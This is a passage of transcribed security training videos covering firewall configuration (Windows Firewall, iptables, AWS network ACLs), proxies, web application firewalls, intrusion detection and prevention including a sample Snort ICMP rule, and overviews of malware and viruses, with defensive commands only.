configuring network access control lists, or ACLs, on your router, whether you're using a Juniper or Cisco
router. You can also configure the Windows firewall solution, or you could use the Linux and Unix iptables
command. Or any newer derivative, such as the FirewallD Daemon. Or you might use other tools, such as
Check Point Firewall-1, the list goes on, and on, and on. In this video we discussed packet filtering firewalls.
[Topic title: Configure a Packet Filtering Firewall. The presenter is Dan Lachance.] In this video, we'll take a
look at how to go about configuring a packet filtering firewall. There are plenty of packet filtering firewall
solutions out there. Some are newer. Some are older. Some are command line based. Some are GUI-based
through a web interface. It just goes on and on. We're going to start by taking a look here at the built-in
Windows Server Operating System Firewall. So I'm going to go to my Windows Start menu and type in fire.
And I'm going to click on Windows Firewall with Advanced Security. Here in this tool, I can see on the left,
I've got a number of inbound rules, as well as a number of outbound rules to control traffic leaving this server.
If I go back to Inbound Rules, you'll notice that the icon to the left of some of the rule names looks like a green
circle, which means it's a rule that's enabled. Whereas others look like a golden padlock, which means it's a
rule that only allows access if there's some kind of a secured connection. Either using IPsec or maybe the rule
is configured to only allow connections from certain user accounts or computers. Any rules that have a grayed
out icon are disabled. So we're going to go ahead and right-click on Inbound Rules on the left and choose New
Rule. We're going to build a rule to allow inbound SSH traffic.
Now there's not an SSH service by default in the Windows Server OS, but certainly we could install one. So
let's assume that we've got one installed and we want to allow connections to it. So we're going to go ahead
and choose Port. We could also alternatively have built a firewall rule based on a program or from the
predefined list of common things that are done. Or we could build a custom rule. Here it's going to be a port.
So I'll choose that and I'll click Next. We know that SSH uses TCP port 22. So I'm going to go ahead and
specify that specific port. But notice in the example, I could have a comma separated list of ports I want to
allow through this rule. Or a range of ports with a starting and ending range and, of course, it is inclusive. So
I'm going to go and click on Next.
I want to allow the connection. Although I could choose allow the connection if it's secure. Again, I could do
that for IPsec or to make sure that only certain user accounts or SSH connections can only come from a certain
computers. I could also block the connection. But in this case I want to allow it. So I'll go ahead and click
Next. In Windows, we have various profiles that apply, depending on if the user is connected to an Active
Directory domain network, a private network, or public.
So what I want to do here is make sure that this only applies when people have their computers at work. Or in
this case where it’s a server it would never be on a different network like at Starbucks or on a home private
network. So, I'll go ahead and click Next, going to call this Allow inbound SSH. And I'll go ahead and click
Finish. And we can see now in the list we've got an active rule, it's got the green circle with the white check
mark, called Allow inbound SSH. Now of course we could do this from the command line using PowerShell
commandlets if we really wanted to. However, let's take a look at how we would configure a simple packet
filtering rule on the Linux platform. Most Linux distributions support the old iptables command as a way of
configuring packet filtering firewall rules. Although there are other options, including graphical ways of
configuring tools. Here we're going to type iptables -L for list. Here we can see that our input chain has a
policy of accept. So it's going to accept everything from anywhere going to anywhere on this host. What we're
going to do is we're going to make sure it only allows SSH. So, I'm going to type iptables -A. I want to add an
INPUT rule item for -p, protocol is tcp. I want to match tcp -m, and the destination port or dport is going to be
22, because that's what SSH uses. So then -j ACCEPT.
I don't want to drop, I want to accept that traffic. And I'm also going to add another rule here. So iptables -A in
the INPUT chain -j DROP. Basically all I want to allow is inbound SSH and drop everything else. So now if I
type iptables -L for list I can now see that we're allowing inbound SSH for the TCP destination port and then
dropping everything else. Let's test to see if that's actually working correctly. Before we test this let's type
ifconfig to see what our IP address is. And here we can see clearly it's 192.168.1.91. Okay, let's go test it. From
a different computer I'm going to ping 192.168.1.91 and notice of course we don't get a response. Because that
traffic should be dropped. The only thing allowed into that Linux host is SSH. So naturally we're going to try
to use PuTTY to open up an SSH session to that same IP address. So we can see we're going to open up an
SSH session on Port 22 on that same IP address. So I'll go ahead and click Open.
And after a moment it asks me to log in. So I'm going to go ahead and specify the appropriate credentials and
we are in. Again if we do an iptables -L for list, we can see the rules that are in place to make this happen.
Another type of packet filtering solution is in the cloud. Here I'm connected to my Amazon Web Services
account where I'm viewing one of my VPCs or Virtual Private Clouds called PubVPC1. A VPC is just a
network that you've defined in the cloud. But what's interesting is that you can define a network ACL or
Access Control List for each VPC in the Amazon Web Services Cloud. The same types of things are possible
with other cloud providers like Microsoft Azure as well. So having that VPC selected here in the list, I'm going
to go down and click on the link next to network ACL. That's going to open up another window where we can
actually start to work with the packet filtering rules for this network, which it actually exists in the cloud.
Having my network ACL selected down below I can see the Inbound Rules tab where we have a list of
inbound rules. Which in this case is allowing traffic from anywhere into the network. In the same way, we've
got Outbound Rules to control traffic leaving this cloud network. So, I'm going to go back to the Inbound
Rules tab and click the Edit button. What we want to do here is change our first rule to allow, not all traffic,
but in our example, only SSH port 22 traffic. And I'll leave the source as 0.0.0.0/0 which means from
anywhere. Now, we don't want this second custom rule being built here. So, I'll click the x to remove that and
I'll click Save. Now, after a moment, that network ACL for that cloud virtual network is now saved. And we
can see down below that we are allowing inbound SSH traffic but blocking everything else. Because the
second rule is a DENY rule. In this video, we learned various ways to configure packet filtering firewalls.
[Topic title: Proxy Servers. The presenter is Dan Lachance.] In this video, I'll talk about proxy servers. A
proxy server eliminates direct connectivity between internal clients and Internet resources, and depending on
the type of Proxy Server, Internet clients connecting to internal resources like a protected web server. So
really, we're talking about protecting the host's identity, where outgoing traffic appears to come from the
proxy.
So that way, the true internal IP address of the host is never known. So, we must configure a proxy server for
specific applications. So, we would have HTTP proxies, FTP proxies, and so on. Transparent proxies don't
require any client configuration. So in other words, as long as the client is configured with the default gateway,
that device, the default gateway, would normally be their proxy server that they connect through to request
content from the Internet. But again, with a transparent proxy, you don't have to go, for instance, into your web
browser and tell it the address and port number of the proxy server. Proxy servers are designed to retrieve
Internet content for internal requesting clients. And that content can be cached to speed up requests for the
same stuff later.
However, the great thing about this is that the internal client identity is never revealed. Now, proxy servers
examine not only packet headers, like a packet filtering firewall, but they also can examine the payload. So for
instance, that means the proxy server would be able to block connections to facebook.com even outside of
specific hours. Now, on a proxy server device, we want to make sure IP routing is disabled. Because we don't
want things being routed out to the Internet at the IP level, thereby bypassing the proxy server. We want the
proxy server to have to examine everything. Proxy servers are sometimes also called caching servers. And it
really depends on how the proxy server gets configured as to whether or not it's configured to cache content.
Proxy servers can also be configured to prefetch Internet content on a scheduled basis. The result of this is that
it speeds up access for that content when clients actually request it. So for instance, if we know that every
morning users need to see information from certain webpages, we can have that pre-cached to speed up their
experience. But we also have to consider the static and dynamic nature of the cached content.
If it's stock quotes that change all the time, we probably wouldn't want to prefetch that type of streaming
information. We can also configure cache aging timers, which is often called the Time To Live or TTL. So,
once data is expired after it's been cached, that cached content gets removed from the server. A reverse proxy
server listens for connection requests for a given network service. So for example, it might listen for TCP port
80 web site connections. Incoming connections to the reverse proxy server get forwarded to an internal host
elsewhere. So for instance, we might forward requests to a protected web server elsewhere listening on either
port 80 or some other port. Normally, reverse proxy servers are placed in a demilitarized zone for publicly
accessible services.
So, it protects the true identity of the internal host offering that network service and it's completely transparent
to external users. They think they're connecting to the real thing. So, this is great because the fact that we're
even using a reverse proxy isn't even know by client devices. There are public proxies that are available out on
the Internet that can anonymize Internet user connections. Now, this could be used for example to allow the
bypassing of normal surfing restrictions, such as media content that is only served within certain countries.
Well, using a proxy anonymizer on the Internet, you can make it look like you're coming from another country.
Now, I'm not suggesting that that's something you should do. It may or may not be legal where you are, but it
is possible. It's part of the technology that's out there. Another way a pubic proxy might be used is so that we
could use social media that's normally prohibited at school or at work. But again, if the rules are in place,
there's usually a good reason, especially at work. So, in essence what it really means is that the Internet user
appears to be initiating connections from a different location. Common proxy server products include Squid,
WinGate, the Cisco Web Security Appliance, and Check Point's Security Gateway. In this video, we talked
about proxy servers.
After completing this video, you will be able to explain the purpose of a security appliance.
Objectives
[Topic title: Security Appliances. The presenter is Dan Lachance.] Firewalls are used to control network
traffic flow by either allowing or denying traffic based on configured criteria. But what about using more than
one type of firewall at once? In this video, we're going to address that by talking about security appliances.
A security appliance is a type of firewall and in some cases it might be specialized. So for example, it might be
focused on intrusion prevention. But at the same time, a security appliance might also be an all-in-one multiple
capability firewall. So that could come in hardware form, where it might be rack-mounted equipment in a
server room or a data center. Or it could come in software form, where we might use various preconfigured
virtual machines that are pretty much ready to go, just a little bit of tweaking is required to get them running as
a security appliance. Of course, you could install your own physical or virtual machine and configure multiple
firewall products manually.
Security appliances, because of their nature, could be an all-in-one firewall, so their capabilities are quite far
reaching. They will have the ability to perform stateful packet filtering with the configuration of network
ACLs. They will have proxying capabilities. In some cases, also reverse proxying. They'll be able to filter
traffic at layer seven of the OSI model, application specific. They might also serve as a VPN appliance, to
allow VPN connections into a private network. A security appliance could also have intrusion detection and/or
prevention capabilities. It might also check for malware, it might also have antiphishing built in. Might even
have video surveillance capabilities built in. So as you can see, a security appliance really could be all
encompassing. It really depends on the specific vendor product that you're using as a security appliance.
Pictured on the screen, we've got an example of a security appliance being connected to through a web
browser. [A screenshot displaying an example of a security appliance connected to a web browser is
displayed. The image is divided into many sections, some of which are Appliance Information, License
Information, Signature Information, Connection Information, CPU usage for last two hours, and Memory
usage for last two hours.] Now, what we can see in the license information section are the components of the
security appliance. The first one is a web and application filter. The second component is Intrusion Prevention
System, IPS. Then we've got antivirus, antispam, we've got a web application firewall and so on. So security
appliances usually have a nice web-based interface that's easy to navigate, so you can not only configure the
various firewall capabilities. But also monitor them or maybe even configure notification when certain events
occur. Some common examples of security appliances include SonicWALL's Network Security Appliance,
Barracuda Web Security Gateway, Cisco Meraki, and also Check Point Security Appliance. In this video we
talked about security appliances.
After completing this video, you will be able to recognize the unique capabilities of web application firewalls.
Objectives
[Topic title: Web Application Firewall. The presenter is Dan Lachance.] In this video, we'll talk about Web
Application Firewalls. A Web Application Firewall is often referred to as a WAF, spelled W-A-F. It's specific
to HTTP connections, and it's designed to mitigate HTTP specific attacks, including things like cross-site
scripting or XSS.
With cross-site scripting, we've got a malicious user that tries to inject scripts that get executed in the client
web browser into web pages. And sometimes this is possible if the developers of a web page haven't carefully
validated the input into the fields. So an attacker then could put some kind of executable script in there. And
then that page would be viewed by an unsuspecting victim where that client side scripting code would execute
within their web browser and do malicious things. Now, another type of HTTP attack handled by web
application firewalls, among many others, are SQL injection attacks. Now, again, this is usually executed by a
malicious user inputting database instructions within a field that isn't properly validated on a web form.
And so, the web server then, takes that data in, and executes it against a back end database where it might
reveal information from the database that otherwise wouldn't normally be. Web application firewalls of course
can be customized due to the various different technologies that might be used with web services. And they are
more specialized than packet filtering firewalls because packet filtering firewalls apply up to layer four of the
OSI model. Now, that deals with things like port addresses, where layer three deals with things like IP
addresses and essentially looking at different packet header fields. But here, we're talking about looking at a
little bit more detailed information within the packet payload, essentially up to layer seven. So the web
application firewall then can come in the form of an appliance, either hardware or software based. It could also
be a server operating system plugin. In the cloud we might have web application firewall services offered by
the cloud provider or if not we might have a virtual security appliance from a specific vendor that we're
running in the cloud as a virtual machine. Take for example Barracuda, where we take a look at their virtual
appliances listed over here on the right hand side of the screen. [The barracuda web site is open. the right-
hand side of the page displays a section named barracuda Virtual Appliances which includes many
subsections, some of which are Barracuda nextGen Firewall F Vx, barracuda Email Security Gateway Vx, and
Barracuda Web Application Firewall Vx.] And there are many vendors that do this, so if we scroll down the
list of virtual security appliances, eventually we'll come across the Barracuda Web Application Firewall. And
of course, if we click on that link, we'll get some details related to it.
And essentially what we're talking about doing with this is bringing down a virtual appliance that we can then
deploy either on-premises or even In the cloud. Web application firewalls are normally configured and
monitored through an HTTPS connection. The web application firewall can also do many other things like
monitoring traffic entering and leaving a specific web app, and so we can detect abnormal HTTP activity. It
sort of has intrusion detection capabilities built in. So it might look for abnormal activities such as large
volumes of unexpected data input to a web application. So this could indicate that a buffer overflow attack is
being executed. Or it could indicate that we've got a denial of service, or if many machines are involved, even
a distributed denial of service attack that's in progress. Also, abnormal database query strings supplied as input
would indicate perhaps a SQL injection attack. So this can be monitored at the web application firewall level.
However, application developers still need to follow secure coding practices to do things like validate input
correctly on web forms. Common web application firewall products include those from NAXSI, which
includes Nginx which is anti-cross site scripting and SQL injection. Also ModSecurity which is open source,
products from Imperva, the Cisco NetScaler product and also appliances from Barracuda. In this video, we
talked about Web Application Firewalls.
After completing this video, you will be able to explain the importance of intrusion detection and prevention.
Objectives
[Topic title: Intrusion Detection and Prevention Overview. The presenter is Dan Lachance.] Today's
networks, more than ever, are potentially susceptible to malicious activity. This could be due to things like the
use of smartphones by everybody to connect to corporate resources and things like ransomware. In this video
we'll talk about intrusion detection and intrusion prevention.
Host Intrusion Detection Systems, or HIDS, are specific to a host, which normally would be running some
kind of specific application that we're trying to protect from malicious activity. But we can also use Network
Intrusion Detection Systems, or NIDS. Network Intrusion Detection Systems aren't specific to a host, but
instead are placed carefully on the network to look for anomalous network activity. So the detection part
comes through monitoring, where one way to do this is to monitor data, current activity data, to a known threat
database. Or compare it to a baseline of normal activity that was taken within a specific environment. Intrusion
detection also can log suspicious activity. Now in that case, we want to make sure that wherever that
information is logged to is kept secure.
So for instance, we might enable log forwarding from a device where we've got intrusion detection being
monitored so that it gets stored elsewhere. We can also correlate current data with related or even older data
historically, to determine that some kind of suspicious activity is taking place. Intrusion detection can also send
notifications to administrators about suspicious activity. Intrusion prevention comes in a couple of forms,
including Host Intrusion Prevention Systems, or HIPS. Of course, much like with intrusion detection, there's
also Network Intrusion Prevention Systems, or NIPS, that work at the network level. Now not only is detection
possible with intrusion prevention, but there can also be an attempt made by the solution to prevent further
damage.
Now intrusion detection and prevention solutions could come in the form of physical hardware, or a virtual
appliance, or software installed within a server OS. Now with intrusion prevention we monitor for suspicious
activity, we can compare that to known threat database problems or against a baseline of normal activity, just
like with intrusion detection. But intrusion prevention allows us to extend that a bit further. So besides the
normal logging of suspicious activity or correlating with current related or older data, and sending notifications
about this activity. Intrusion prevention systems can be configured to attempt to stop the activity once it's
detected. Now this could come in many forms depending on what it is it detects. For instance, we might have
our intrusion prevention system configured to block connections from offending IP subnet ranges or addresses
if we've got suspicious activity from those sources. Or maybe to block a port for an attack that's in progress.
Now you might want to be careful with this when you configure the parameters for that kind of setting.
Because if we're talking about a web server, and it's looks like it's being attacked with a distributed denial of
service attack, do you really want block that web server port, because you're also preventing legitimate
connectivity. But the argument against that of course is that well, legitimate activity won't occur anyway if it's
being overloaded with useless traffic. We should also consider whether we want to quarantine things like
suspected malware or suspected processes. This is also considered suspicious activity. This needs to be
configured for the specific environment that you want to use this in. And the reason is because you might end
up with too many false positives, things that could potentially appear to be suspicious and therefore you might
be closing ports or stopping processes when in fact they're benign. So it is specific to each and every
environment. In this video we did an intrusion, detection, and prevention overview.
After completing this video, you will be able to recognize when to use a HIDS.
Objectives
Now, the data would be current activity data that is being captured by our Host Intrusion Detection System. It
can also compare current activity data to a baseline of normal activity. But that's only going to work properly if
a baseline of normal activity for a given host has already been taken. You might have to capture activity, for
example, perhaps for a few days or for an entire work week on a system to determine what's normal in the first
place. Because from that our Host Intrusion Detection System can then have some kind of relative comparison
point or reference point where can determine what is suspicious or abnormal.
The Host Intrusion Detection Systems might come in a hardware form, it might be rack mountable equipment.
Or it might be software you install within a server operating system. It might be a dedicated virtual machine
appliance that you run on-premises or in the cloud. There are many various solutions available. Host Intrusion
Detection Systems are designed to monitor details or activity related to a specific application. However, it's
common that you need to train your Host Intrusion Detection solution for your specific environment. Some
HIDS solutions have a learning mode where you can have them establish a baseline of normal usage activity.
However, you might also have to manually configure specific rules or tweak them yourself to eliminate false
positives. A false positive is essentially a triggered alert for something that the system thinks is suspicious
when in fact it's actually normal and benign. So, what we see on the screen then is an example of a Snort rule.
The Snort IDS or Intrusion Detection System, is a common open source IDS solution. So, in this example, we
are configuring an alert. [The following code is displayed: alert icmp any any -> any any (msg:"ICMP Traffic
Detected";sid:3000003;). Code ends.] What it's going to do is generate an alert if there is any ICMP traffic
from any host to any host, and we're assigning it a Snort ID rule, here seen as 3000003. And we can determine
if we configure Snort further, whether we are generating email modifications, writing to a log or doing both
and so on. So that's a sample Snort IDS rule. How you configure the rules will vary depending on your
solution. Some are more graphically based whereas Snort here we can see allows us to configure our rules at
the command level although it does give us increased flexibility this way. With a Host Intrusion Detection
System it has the ability to run on a host itself as opposed to a network. What this means is for applications that
deal with network encrypted data that network encrypted data gets decrypted by the host. This means then, that
the decrypted version of that data is then available for IDS examination. Whereas, with a Network Intrusion
Detection System in most cases any encrypted network data isn't examined by the Network Intrusion Detection
System. There are some exceptions because there are some Network Intrusion Detection Systems that do have
the ability for you to specify an encryption key. Or to import, for example, a PKI certificate that contains a
decryption key. In this video we talked about Host Intrusion Detection Systems.
[Topic title: Network Intrusion Detection Systems. The presenter is Dan Lachance.] In this video we'll talk
about network intrusion detection systems. Network intrusion detection systems are often referred to as NIDS.
It's designed to look for inappropriate or unauthorized use specifically on a network as opposed to a specific
host on the network.
So it can be configured to compare data that's current activity data to known threats on the network. Or it can
be configured instead of or in addition to, to compare current activity data on the network to a baseline of
normal activity. But much as is the case with a host intrusion detection system, a network intrusion detection
system has to have an existing baseline of normal activity.
And what's normal on a network within one company will be different from what is normal on a network for a
different company. So it is specific to an organization. We need to consider the placement of the NIDS on the
network. So for instance, if we want our network intrusion solution to be able to monitor all network traffic,
we must make sure it's placed appropriately so that it can see all network traffic. So if we were specifically
doing this for Internet traffic, inbound and outbound, we'll probably want to make sure that our NIDS is in the
middle of the connectivity between our internal network and the Internet. In the case of network switches, we
might have to plug our network intrusion detection system into a specific switch port. And the switch
administrator might have to configure port forwarding or copying of data for all ports to the one that the NIDS
is plugged into. Just like with host intrusion detection systems, a NIDS could be a hardware appliance.
Or it could be software installed in a server operating system, or it might be a specialized operating system. An
appliance essentially, whether it's virtual that you run in the cloud, or a virtual appliance that you run on
premises. The network intrusion detection system needs to be trained for your specific environment, again,
similar to a host intrusion detection system. Many NIDS solutions will have a learning mode, where essentially
you can configure it to monitor activity for a period of time to establish a baseline of normalcy in your
environment. You can also instead of or in addition to, normally it's in addition to, configure specific rules for
what is considered suspicious network activity and what to do about it. And also you can tweak it to eliminate
false positives. On the encrypted network data level, generally speaking network intrusion detection systems
can't examine encrypted data. Now of course, as always there are exceptions to every rule.
There are some NIDS systems that will allow you to specify decryption keys in various forms so that they can
examine encrypted data. But generally speaking, this is not the case. So we might have one solution that does
allow us to enter perhaps a symmetric key or phrase, or even to import a PKI certificate for decryption. A
NIDS looks for various hints of abnormal network activity. And that's going to include things like
reconnaissance. Reconnaissance is one of the first phases an attacker would undertake before they start to try
to exploit vulnerabilities.
Basically, it's learning for the malicious user about what's out there. This can be done through ping sweeps to
determine which hosts are actually up and running on the network. Or conducting port scans to identify which
network services are running on hosts on the network. Also it includes SNMP scanning. SNMP stands for
Simple Network Management Protocol. This has been around for decades. And it's a way for us to use a
management station to query information about a network device, whether it's a server, a router, a switch and
so on. So we can get statistics through SNMP by querying an SNMP MIB, Management Information Base. Or
in some cases SNMP can also be used to write configuration changes over the network to network devices.
SNMP normally occurs over UDP port 161. So that might be something we want to consider when configuring
packet filtering rules.
Network exploits, essentially, can be determined because a malicious user will normally try to test discovered
targets for weaknesses. And that might not be normal activity against a service. So for instance, running a
Telnet session to poke and prod at an HTTP server, instead of actually issuing a standard HTTP GET request
to retrieve information from the web page, could be an indicator of suspicious activity. We might also have a
NIDS that looks for hints of denial of service attacks. A denial of service attack, or DoS, D-O-S, essentially is
excessive traffic or activity on a specific host beyond normal usage. Now that might be executed by locally
installed malware or it might be executed even over the network. Common network intrusion detection
products include the Snort open source tool, AlienVault Unified Security Management, or USM, and Symantec
NetProwlers, among many solutions. In this video we talked about network intrusion detection systems.
Upon completion of this video, you will be able to recognize when to use the NIPT test.
Objectives
[Topic title: Network Intrusion Prevention Systems. The presenter is Dan Lachance.] In this video, we'll go
over network intrusion prevention systems. Network intrusion prevention systems are often called NIPS, N-I-
P-S, for short. They're designed to look for inappropriate or unauthorized use at the network level. So network
activity then is monitored and compared against known threats or compared against a baseline of normal
activity taken for that network.
Similar to network intrusion detection systems. We should consider the placement of the network intrusion
prevention solution on the network. Because if we needed to see all network traffic then it must be placed
accordingly on the network. Maybe within a demilitarized zone if that's what we're looking for in terms of
network intrusions. Or maybe it needs to be on an internal switch port that can see all traffic within the switch.
Intrusion prevention allows us not only to identify potential suspicious activity as network detection does.
But it has the added benefit of being able to do something about it, like responding to threats immediately.
Now it can prevent the exploit of vulnerabilities once suspicious activity is detected and we have to think about
the placement again of this solution. Because it needs to be between the potential threat and the asset that's
being protected. So, for example, our network intrusion prevention solution might be placed after the Internet
firewall, but before our web application server. If that's what we're looking for in terms of network intrusions.
Some prevention actions that are available include the ability to log suspicious activity and notify
administrators of it. Now, that could be considered prevention, of course, not real time, in that administrators
could take action. However, that makes this no different then from a network intrusion detection system. Now,
what makes it a network intrusion prevention system is the ability to do things like dropping suspicious
packets, blocking connections based on IP subnet ranges or individual addresses. Resetting specific sessions
that seem suspicious, or quarantining malware or suspicious processes. There are many products that allow us
to implement network intrusion prevention. And some of them will support, of course, both network intrusion
detection and prevention within the same solution, whether it's a hardware appliance or a software solution.
Common products include the open source Snort tool, Trustwave's Intrusion Detection and Prevention
solution, and Symantec NetProwler. In this video, we talked about network intrusion prevention systems.
Find out how to prevent threats from materializing and follow proper forensic procedures.
Objectives
Exercise Overview
[Topic title: Exercise: Prevent and Investigate Security Problems. The presenter is Dan Lachance. ] In this
exercise, you'll begin by differentiating packet filtering firewalls from proxy servers. Then, you'll differentiate
host intrusion detection systems from host intrusion prevention systems. You'll then explain ransomware.
You'll then view deleted files on a hard disk. And finally, you'll configure the Windows firewall to allow
inbound SSH traffic from the 172.16.0.0/16 network. At this point, pause the video, go through each of these
exercise steps and then come back here to view the results.
Solution
Packet filtering firewalls allow or deny network traffic. Criteria can be based on the packet headers but not the
content or the payload in the packet itself. So we can build our criteria based on source and destination IP
addresses, source and destination ports, protocol type and so on. Proxy servers, on the other hand, can protect
the identity of internal clients. This is because outgoing traffic is really done by the proxy server on behalf of
the internal client. And proxy servers also have the ability to examine application level data. So they can look
all the way down into the payload, or data within the packet, beyond just its headers, like packet filtering
firewalls do. A Host Intrusion Detection System, or HIDS, runs on a specific host and can examine host
processes and logs. It can examine application-specific nuances, and then it can detect anomalies related.
The anomalies can be logged, and/or notifications sent. With an Intrusion Prevention System, in this case a
Host Intrusion Prevention System, the added capability is of stopping suspicious activity beyond just logging
and notifying of it. Ransomware is a form of malware where the computer system use could be blocked while
waiting for a payment. And then otherwise, if the payment is made, then some kind of a code is given to the
victim and they can continue using their system. Another form of ransomware will encrypt files. And in the
same way, the ransom must be paid, in this case, before the files are decrypted. There are hundreds of tools
that can be used to view deleted files, in this case, on the Windows platform. Here I'm going to use the
Restoration tool, [Dan accesses the Restoration tool and the Testoration Version window opens.] where I can
tell it which disk I want to view. And then I can simply put in wildcards if I only want to see certain types of
files. Or I can just click Search Deleted Files if I want to see them all. While the Windows firewall can be
configured here in the GUI, it can also be configured at the command line. For instance, using PowerShell
cmdlets. Here we'll use the GUI. So we're going to build an inbound rule as the exercise stated. So I'll right-
click build a New Rule. [He right-clicks the Inbound Rules subnode and selects New Rule from the shortcut
menu and the New Inbound Rule Wizard opens.] It's going to be based on a Port, because it was for SSH. So
the port number is going to be TCP port 22. And I want to Allow the connection. And I'll apply to all of the
network profiles, and I'll specify a Name. I'll call this SSH In. Now after the rule is created for SSH In, I'm
going to double-click and open it up and [The SSH In Properties dialog box opens which displays many tabs
such as Protocols and Ports, Scope, and Advanced.] click the Scope tab, where I can specify IP address ranges
where we can allow connections from. For example, 172.16.0.0/16, [He enters the IP address in the IP
Address window.] as was required in the exercise.
Table of Contents
[Topic title: Malware Overview. The presenter is Dan Lachance.] In this video we'll do a malware overview.
Malware is malicious software. This type of software gets installed and runs on a machine without user
consent or through trickery. Malicious user motivations for creating, deploying and using malware comes from
financial purposes, bragging rights. There could be political or ideological reasons why they are executing
these type of infections, or simply for reconnaissance to learn more about a potential target that they want to
compromise. Malware types come in many forms. We could have viruses which attach themselves to files,
worms, which are self-propagating over the network using standard file sharing methods, or Trojans, which
essentially look not suspicious, but rather they look legitimate, they look benign. But they in fact contain a
malware payload. Or we could have spyware that monitors our activity, for example, our web surfing habits or
our banking habits. But how does a malware infection actually occur? Well, this list is just the tiniest of
samplings. There are many ways this can occur. One way is by people downloading BitTorrents. Whether
they're downloading the latest movie that's in the theaters that perhaps they really shouldn't be doing due to
copyright laws, or they're downloading things that they otherwise would need to pay for legitimately. Often
with a BitTorrent download indeed it does contain what the user was looking for, for example, the latest
theatrical release of a movie. But at the same time, when that movie is run it could be executing malware in the
background, unbeknownst to the user. Even viewing a web site in some cases can infect a machine without
even clicking anything on the site. This is often called a drive-by infection.
Now, it does depend, of course, on the web site and its nature of malicious content. But it also depends on the
user's web browser and how it's configured. Now certainly, if the user gets a message about their computer
being infected and then they click on a link to run a scan, which in itself is really infecting the machine. That's
the user actively clicking on something. But there are times when the user doesn't have to click on anything
and their machine can still be infected. So installing software that seems benign, such as, for instance, a virus
scanner, or any type of free software especially. Clicking a web site link that a user might receive in an email,
and often these are targeted to users. And the text in the message is often convincing to trick the user into
thinking this is specifically for them. Maybe to reset a banking account password or so on. Opening file
attachments should also be approached with suspicion. Unless we are expecting a specific file attachment, we
should be very careful as to whether or not we're going to open it. Symptoms of a malware infection include
things like performance degradation on the machine, so the machine slows down. We might also get email
notifications regarding abnormal account usage.
And it might actually be legitimate. We might get an email notification from our bank, or PayPal or our email
account, whether it's Google or Outlook.com. But we have to be careful. Because how do we know that this
email notification itself isn't some form of social engineering or trickery? Any unexpected change settings on
the machine could potentially indicate an infection. It could also have been pushed centrally by an
administrator's configuration change. However, things like web browser start pages being changed and not
being able to be changed back, or processes running in the background that we're not familiar with, potentially
could indicate an infection. But you want to be careful because sometimes they could be legit. Any unexpected
newly installed web browser plugins could also be an indication of an infection, as are disabled software
update mechanisms. A malware toolkit facilitates the creation of malware for a malicious person. And there
are many of them out there, believe it or not. So, for instance, the Blackhole exploit kit contains tools and
tutorials and documentation on how to create and propagate malware. There are also underground chat rooms
on the Internet that are available. And of course, membership is by invitation only, where there is actually
malware for sale to the highest bidder. So how do we mitigate malware? Number one, user awareness and
training. Everybody in the organization needs to be in the know about understanding how easy it is to infect a
machine even through trickery or social engineering.
We should also make sure we've got up to date antimalware scanning on all devices, including smartphones.
The same thing is true for personal firewalls. It needs to be on every device, looking at traffic coming into the
device and leaving the device even at the smartphone level. We should always, within the corporation, limit
use of removable media because that's one way that infections can be brought into an environment. Of course,
your antimalware scanner might pick it up before it causes damage. We should also limit Internet file
downloads and be very suspicious when opening links in email messages, as well as opening file attachments
from email messages. Common malware products or rather antimalware products include those from
Kaspersky, McAfee, Sophos, AVG and Windows Defender. Now just because we might be using a free
antimalware solution like Windows Defender, doesn't necessarily mean it's not as good as some of the paid
solutions. Now of course with a malware solution at the enterprise level, we want some kind of centralized
way to deploy and control the configuration of our antimalware and also have some kind of central notification
and reporting mechanism available. Now in that case, you might have to pay for a solution that does that. But
just because you're paying for an antimalware solution doesn't necessarily mean it's better than the free ones. In
this video we discussed malware.
identify viruses
[Topic title: Viruses. The presenter is Dan Lachance.] In this video, we'll discuss viruses. A virus is a form of
malware that installs and runs without user consent or through trickery, or maybe a combination of both. By
tricking the user to install software that looks legitimate but unleashes a virus in the background. Viruses
normally replicate themselves by attaching to data files, scripts, executable program files, or even disk sectors
in some cases. The way that viruses get transmitted is often through e-mail file attachments that people open,
or in some cases, through files that people download from the Internet. The timing of the virus is such that it
might be executed immediately upon infection, or in some cases, it might wait for a specific date of some
significance or some kind of condition to be met on the machine. So this type of virus that waits for a date or
condition to be met is called a logic bomb. In the 1990s, this is exactly what the Michelangelo virus was about.
It waited until March 6th, in the early 90s, before it would execute. Back in the early 90s, Michelangelo was
transmitted through infected floppy discs. Which these days, can be done through infected USB drives, with
other forms of malware, or infected file downloads from the Internet. The idea with the Michelangelo virus
was that it was a boot sector infecting virus. So when the OS booted, it was resident in memory.
And was, supposedly on Michelangelo's birthday, supposed to wipe out the hard disk by overwriting it with
random characters. But in the end, on March 6th of 1992, very few computers were actually affected by the
Michelangelo virus compared to the ominous predictions. A macro virus is embedded in the macro language
code for a specific application. For example, a Microsoft Word macro virus could trigger when a user opens an
infected document that would trigger ransomware to encrypt their files. Of course, the user would then have to
pay a ransom to potentially receive a decryption key. So one thing that we could do is disallow the autorunning
of macros, such as when files are opened. We could only allow the use of trusted and digitally signed macros.
Or, if we don't use macros at all, we're probably better off completely disabling it to reduce our attack surface.
Consider the example of macrosecurity here in Microsoft Excel. [A Microsoft excel file named Book1 is
open.] I'm going to go to the File menu, where I'm going to go all the way down to Options. [The Excel
Options dialog box opens which displays many tabs. Some of the tabs are General, Formulas, Proofing, Save,
language, Advanced, Customize Ribbon, Quick Access Toolbar, Add-ins, and Trust Center. The box also
includes buttons named Ok and Cancel.] On the left, I'll then click on Trust Center. And then on the right, I'll
click the Trust Center Settings button. [The Trust Center dialog box opens. The box is divided into two
sections. The first section displays many tabs such as Macro Settings, Protected View, Trusted Locations, and
Message Bar. The Macro Settings tab is selected by default and the second section displays information
related to the selection made in the first section. Information on Macro settings and Developer Macro Settings
is displayed. In the macro settings section, The Disable all macros with notification is selected by default. The
box includes two buttons named Ok and Cancel.] Here on the left, you can see that Macro Settings are
selected. So on the right, it's currently set to disable all macros with a notification.
But there are other options, such as disabling all macros without a notification, disabling all macros except
those that are digitally signed and, of course, trusted. Or, we could enable all macros, which is definitely not
recommended. And again, if your users don't even use macros, you might completely disable it in this specific
application. Now, here in Microsoft Excel, over on the left, we've also got Trusted Locations. [Dan clicks the
Trusted Locations tab and the second section displays the Trusted Locations.] In other words, locations on the
network from which we are allowed to open files. So files in other folders might not be trusted and might
prompt us with a warning message. There are countless virus examples, including 2009's Stuxnet virus. This
one damaged uranium enrichment equipment in Iran, and it was propagated as a worm. So it was self-
propagating over a network. 2009 also saw the Conficker virus, which was a botnet infector. Botnet, of course,
is a group of computers under single malicious user control. And of course, now in 2016, we keep hearing
